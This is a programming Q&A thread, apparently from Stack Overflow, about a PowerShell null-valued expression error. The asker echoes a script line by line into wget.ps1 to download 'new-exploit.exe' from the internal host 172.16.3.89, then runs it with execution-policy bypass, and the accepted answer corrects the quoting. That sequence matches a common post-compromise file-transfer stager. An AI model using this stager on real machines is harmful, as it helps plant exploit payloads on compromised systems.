# My Powershell Script Doesn't Download File and Gives Null-Valued Expression Error

Tags: powershell

Here is the my powershell script to download a file from a remote machine:

Powershell Console:

```
C:\Users\XXX> echo $storageDir = $pwd > wget.ps1
C:\Users\XXX> echo $webclient = New-Object System.Net.WebClient >> wget.ps1
C:\Users\XXX> echo $url = "http://172.16.3.89/new-exploit.exe" >> wget.ps1
C:\Users\XXX> echo $file = "new-exploit.exe" >> wget.ps1
C:\Users\XXX> echo $webclient.DownloadFile($url,$file) >> wget.ps1
```

The last line gives the following error:

Output:

```
You cannot call a method on a null-valued expression.
At line:1 char:29
* echo $webclient.DownloadFile <<<<< ($url,$file) >> wget.ps1
*CategoryInfo : InvalidOperation: (DownloadFile:String [], RuntimeException
*FullyQualifiedErrorId : InvokeMethodOnNull
```

If I handle the last line, I can download the file in powershell with the following command :

Powershell Console:

```
C:\Users\XXX> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -File wget.ps1
```

How can I solve the $webclient "null-valued expression" problem? Do you have any idea?

Comment: `new-exploit.exe` -> not sketchy at all!

Answer (score 1, accepted):

You are not writing the lines as-is in the output file, they are being interpreted and executed.

For example, the 1st line writes to `wget.ps1` 3 things: the value of the variable `$storageDir`, an equals sign, and the value of the variable `$pwd`. The null-valued expression indicated is the `$webclient` variable, which indeed is evaluated to null when you execute the 5th line.

In order to achieve what you mean, you should put into single-quote the contents of every line:

```
echo '$storageDir = $pwd' > wget.ps1
echo '$webclient = New-Object System.Net.WebClient' >> wget.ps1
echo '$url = "http://172.16.3.89/new-exploit.exe"' >> wget.ps1
echo '$file = "new-exploit.exe"' >> wget.ps1
echo '$webclient.DownloadFile($url,$file)' >> wget.ps1
```

Answer (score 0):

i don't really understand what you trying to do but in order to download a File you could use this snippet as reference:

```
$downloadPath = "http://ipv4.download.thinkbroadband.com/5MB.zip"
$storageDir = "$PSScriptRoot\5mb.zip"
(New-Object System.Net.WebClient).DownloadFile($downloadPath, $storageDir)
```

Source:
https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

Hope this helps!

Greetz